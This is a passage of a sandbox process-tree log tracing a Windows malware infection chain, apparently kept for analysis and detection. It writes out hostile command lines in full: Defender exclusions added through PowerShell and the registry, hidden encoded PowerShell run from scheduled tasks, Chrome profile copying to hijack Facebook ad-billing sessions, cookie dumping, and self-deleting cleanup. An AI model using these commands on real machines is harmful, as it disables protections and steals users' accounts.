C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 700
11⤵
- Program crash
PID:5400

C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe
"C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
PID:1112

C:\Users\Admin\AppData\Local\Temp\is-LAM3M.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LAM3M.tmp\vict.tmp" /SL5="$303BC,870426,780800,C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5272

C:\Users\Admin\AppData\Local\Temp\is-JFUDP.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-JFUDP.tmp\winhost.exe" 535
10⤵
- Executes dropped EXE
PID:5148

C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
PID:4824

C:\Users\Admin\AppData\Local\Temp\is-RUSB9.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RUSB9.tmp\Setup3310.tmp" /SL5="$203AA,138429,56832,C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe" /Verysilent /subid=577
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5152

C:\Users\Admin\AppData\Local\Temp\is-OQ5AV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OQ5AV.tmp\Setup.exe" /Verysilent
10⤵
PID:5644

C:\Program Files (x86)\VR\Versium Research\customer5.exe
"C:\Program Files (x86)\VR\Versium Research\customer5.exe"
11⤵
PID:3276

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
12⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b edge
13⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b chrome
13⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b firefox
13⤵
PID:3920

C:\Program Files (x86)\VR\Versium Research\RunWW.exe
"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"
11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
12⤵
PID:6876

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
13⤵
- Kills process with taskkill
PID:6080

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
13⤵
- Delays execution with timeout.exe
PID:4876

C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"
11⤵
PID:5116

C:\Program Files (x86)\VR\Versium Research\moSvKMEovuRx.exe
"C:\Program Files (x86)\VR\Versium Research\moSvKMEovuRx.exe"
11⤵
PID:5508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
12⤵
PID:2400

C:\Program Files (x86)\VR\Versium Research\22.exe
"C:\Program Files (x86)\VR\Versium Research\22.exe"
11⤵
PID:5228

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
12⤵
PID:7120

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
13⤵
PID:2888

C:\Program Files (x86)\VR\Versium Research\RmSetp.exe
"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"
11⤵
PID:5192

C:\ProgramData\2945365.exe
"C:\ProgramData\2945365.exe"
12⤵
PID:6376

C:\ProgramData\1660466.exe
"C:\ProgramData\1660466.exe"
12⤵
PID:5664

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
13⤵
PID:5732

C:\Program Files (x86)\VR\Versium Research\lylal220.exe
"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
11⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\is-KD9VB.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KD9VB.tmp\lylal220.tmp" /SL5="$304B0,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
12⤵
PID:576

C:\Users\Admin\AppData\Local\Temp\is-LP0NU.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-LP0NU.tmp\Microsoft.exe" /S /UID=lylal220
13⤵
PID:7048

C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe
"C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe" /VERYSILENT
14⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\is-MDJRF.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MDJRF.tmp\irecord.tmp" /SL5="$205DA,6265333,408064,C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe" /VERYSILENT
15⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\c1-abc27-28c-9e39d-7bbfd8b7b08c2\Hashavadyshae.exe
"C:\Users\Admin\AppData\Local\Temp\c1-abc27-28c-9e39d-7bbfd8b7b08c2\Hashavadyshae.exe"
14⤵
PID:7012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe & exit
15⤵
PID:7000

C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe
16⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7340

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe & exit
15⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe
16⤵
PID:6124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe & exit
15⤵
PID:7780

C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe
16⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:5468

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:7748

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
17⤵
PID:2476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
17⤵
PID:352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,16581387764932533787,23782698754723501,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1616 /prefetch:8
18⤵
PID:7344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe & exit
15⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe
C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe
16⤵
PID:6792

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
17⤵
PID:3000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe & exit
15⤵
PID:7492

C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe
16⤵
PID:1876

C:\ProgramData\4762684.exe
"C:\ProgramData\4762684.exe"
17⤵
PID:7212

C:\ProgramData\2977296.exe
"C:\ProgramData\2977296.exe"
17⤵
PID:6436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe & exit
15⤵
PID:7704

C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
16⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
17⤵
PID:6696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\luecfnoy.mus\GcleanerWW.exe /mixone & exit
15⤵
PID:2420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe & exit
15⤵
PID:7444

C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe
C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe
16⤵
PID:7468

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
17⤵
PID:7184

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
18⤵
PID:6776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe & exit
15⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe
16⤵
PID:3588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe /8-2222 & exit
15⤵
PID:7452

C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe
C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe /8-2222
16⤵
- Checks computer location settings
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Solitary-Leaf'
17⤵
PID:7944

C:\Program Files (x86)\Solitary-Leaf\7za.exe
"C:\Program Files (x86)\Solitary-Leaf\7za.exe" e -p154.61.71.13 winamp.7z
17⤵
PID:4852

C:\Program Files (x86)\Solitary-Leaf\setup.exe
"C:\Program Files (x86)\Solitary-Leaf\setup.exe" /8-2222
17⤵
PID:5252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe
C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe /S /kr /site_id=754
16⤵
PID:1356

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:7300

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:6024

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:5440

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
PID:8032

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPvmhpTBx" /SC once /ST 17:23:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:6216

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPvmhpTBx"
17⤵
PID:5568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPvmhpTBx"
17⤵
PID:8044

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AOjWXva.exe\" 9n /site_id 754 /S" /V1 /F
17⤵
- Creates scheduled task(s)
PID:492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe & exit
15⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe
C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe
16⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 1 3.1616869590.605f78d65326f 104
18⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 2 3.1616869590.605f78d65326f
19⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe
"C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe" /VERYSILENT /id=535
20⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\is-CEE06.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CEE06.tmp\vict.tmp" /SL5="$20394,870426,780800,C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe" /VERYSILENT /id=535
21⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\is-KAEPO.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-KAEPO.tmp\winhost.exe" 535
22⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\1dqpxxrttff\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\1dqpxxrttff\AwesomePoolU1.exe"
20⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:6036

C:\Users\Admin\AppData\Local\Temp\is-S3JBI.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S3JBI.tmp\Setup3310.tmp" /SL5="$303A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:7568

C:\Users\Admin\AppData\Local\Temp\is-J8TPQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-J8TPQ.tmp\Setup.exe" /Verysilent
22⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\3ps33h4ns5x\qyyxvoqvedl.exe
"C:\Users\Admin\AppData\Local\Temp\3ps33h4ns5x\qyyxvoqvedl.exe" /ustwo INSTALL
20⤵
PID:7360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 652
21⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 664
21⤵
- Program crash
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 620
21⤵
- Program crash
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 816
21⤵
- Program crash
PID:8080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 872
21⤵
- Program crash
PID:7508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 840
21⤵
- Program crash
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 1148
21⤵
- Program crash
PID:8832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 1080
21⤵
- Program crash
PID:9172

C:\Users\Admin\AppData\Local\Temp\vktcq5pke2e\rsxjyxbozpl.exe
"C:\Users\Admin\AppData\Local\Temp\vktcq5pke2e\rsxjyxbozpl.exe" /1-610
20⤵
PID:2196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Purple-Fire'
21⤵
PID:5404

C:\Program Files (x86)\Purple-Fire\7za.exe
"C:\Program Files (x86)\Purple-Fire\7za.exe" e -p154.61.71.13 winamp.7z
21⤵
PID:8680

C:\Program Files (x86)\Purple-Fire\rsxjyxbozpl.exe
"C:\Program Files (x86)\Purple-Fire\rsxjyxbozpl.exe" /1-610
21⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\k23mpf51elp\app.exe
"C:\Users\Admin\AppData\Local\Temp\k23mpf51elp\app.exe" /8-23
20⤵
PID:5760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Summer-Shadow'
21⤵
PID:3720

C:\Program Files (x86)\Summer-Shadow\7za.exe
"C:\Program Files (x86)\Summer-Shadow\7za.exe" e -p154.61.71.13 winamp.7z
21⤵
PID:1164

C:\Program Files (x86)\Summer-Shadow\app.exe
"C:\Program Files (x86)\Summer-Shadow\app.exe" /8-23
21⤵
PID:9852

C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe
"C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe" ll
17⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\is-P24K2.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P24K2.tmp\setups.tmp" /SL5="$60364,408070,216064,C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe" ll
18⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\c4-f55f0-4c7-4f1ad-9d07b36d9fc0c\Rucyvawyvo.exe
"C:\Users\Admin\AppData\Local\Temp\c4-f55f0-4c7-4f1ad-9d07b36d9fc0c\Rucyvawyvo.exe"
14⤵
PID:4152

C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
11⤵
PID:2824

C:\Users\Admin\AppData\Local\Temp\is-46TJ9.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-46TJ9.tmp\LabPicV3.tmp" /SL5="$30608,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
12⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\is-OPDGN.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-OPDGN.tmp\ppppppfy.exe" /S /UID=lab214
13⤵
PID:6216

C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe
"C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe" /VERYSILENT
14⤵
PID:732

C:\Users\Admin\AppData\Local\Temp\is-3I39D.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3I39D.tmp\prolab.tmp" /SL5="$405D6,575243,216576,C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe" /VERYSILENT
15⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\9d-324e4-677-e8a88-17b39cb25c043\Cyxaedaqaeshu.exe
"C:\Users\Admin\AppData\Local\Temp\9d-324e4-677-e8a88-17b39cb25c043\Cyxaedaqaeshu.exe"
14⤵
PID:5060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe & exit
15⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe
16⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7352

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe & exit
15⤵
PID:7620

C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe
16⤵
PID:7824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe & exit
15⤵
PID:8044

C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe
16⤵
PID:188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe & exit
15⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe
C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe
16⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"
17⤵
PID:1120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe & exit
15⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe
16⤵
PID:7532

C:\ProgramData\5176678.exe
"C:\ProgramData\5176678.exe"
17⤵
PID:6560

C:\ProgramData\2136092.exe
"C:\ProgramData\2136092.exe"
17⤵
PID:6740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe & exit
15⤵
PID:8024

C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
16⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
17⤵
PID:1536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yx3nquwg.xp0\GcleanerWW.exe /mixone & exit
15⤵
PID:7608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe & exit
15⤵
PID:2936

C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe
C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe
16⤵
PID:7692

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
17⤵
PID:6260

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
18⤵
PID:4208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe & exit
15⤵
PID:7724

C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe
16⤵
PID:6180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe /8-2222 & exit
15⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe
C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe /8-2222
16⤵
PID:2764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Wandering-Glade'
17⤵
PID:5132

C:\Program Files (x86)\Wandering-Glade\7za.exe
"C:\Program Files (x86)\Wandering-Glade\7za.exe" e -p154.61.71.13 winamp.7z
17⤵
PID:5092

C:\Program Files (x86)\Wandering-Glade\setup.exe
"C:\Program Files (x86)\Wandering-Glade\setup.exe" /8-2222
17⤵
PID:5576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe
C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe /S /kr /site_id=754
16⤵
PID:396

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:7176

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:7708

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:6092

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
PID:3800

